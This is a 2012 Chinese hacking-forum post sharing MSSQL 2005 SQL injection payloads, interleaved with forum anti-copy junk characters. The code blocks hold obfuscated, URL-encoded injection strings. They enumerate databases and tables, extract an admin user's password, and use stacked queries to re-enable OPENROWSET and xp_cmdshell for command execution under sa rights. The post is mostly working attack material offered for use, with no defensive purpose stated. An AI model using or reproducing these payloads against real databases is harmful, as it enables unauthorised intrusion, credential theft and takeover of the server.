找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2002|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

/ p; L; L+ B/ q" I5 G, _- e5 C7 o/ h0 e9 ]$ }& V2 C( o3 \2 D7 J8 D
" p- y; `* r) [  H4 y: X) [' l% a
[Copy to clipboard]CODE:
* y$ G  d. V8 F% u' O9 t& d" W  Z/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
* g: }: Y- o1 \7 J: E1 e+ |2 Z1 V& k* [2 t
爆表语句,somedb部份是所要列的数据库,红色数字1累加1 v# @6 ^5 `+ q2 a$ O

& H+ T/ d" ^/ f' }" e$ r
. b* u5 c/ u8 l' g3 z: _9 V+ h, r0 q[Copy to clipboard]CODE:
0 x; D7 Y, E" w/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--$ O+ ~/ n0 i/ L# h; l& i* A$ e7 v' e
7 Q$ S, h7 z" Y7 j5 b  [# b0 |/ O
爆字段语句,爆表admin里user='icerover'的密码段6 M4 V1 i2 N1 ^9 s$ E
( W1 U% M9 B' U* n+ R. \" z

9 c/ u0 K2 B0 Z$ F; f9 B[Copy to clipboard]CODE:
3 t6 |+ S7 X  C$ y) b* |/ G**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
2 X( J. |+ W  g; h4 o2 o+ f2 Q1 }& ]% ?+ ?
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
6 ~3 F- f7 |; r如果是sa权限,可以这样来开启" G. [: M) l. h" o- l( v4 f
开启openrowset& V  {! S' g* U# n% o$ i

) P4 I! N# g. U- d! j- B4 N1 Q+ k% V  G3 ~5 r
[Copy to clipboard]CODE:3 R  C; X! p# g- R
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--- A0 b. l2 ^* [+ v
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--5 ~' C" t# Z  e. i
. K3 y$ _7 G9 C  t; ^$ J
开启xp_cmdshell
0 J" ]4 Y; S6 b; d  }
% a. l5 _3 @' W2 U, R
0 D$ g' u% O) C7 N+ i[Copy to clipboard]CODE:
+ l3 R+ r, G* [EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
6 T" o$ W( E+ }2 c3 u" ?EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--. {5 r, {! \7 k; {1 K5 a
  _) V0 e" M% c# D
ok,over~~晚安0 p3 {" W; o' o2 y3 V/ v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表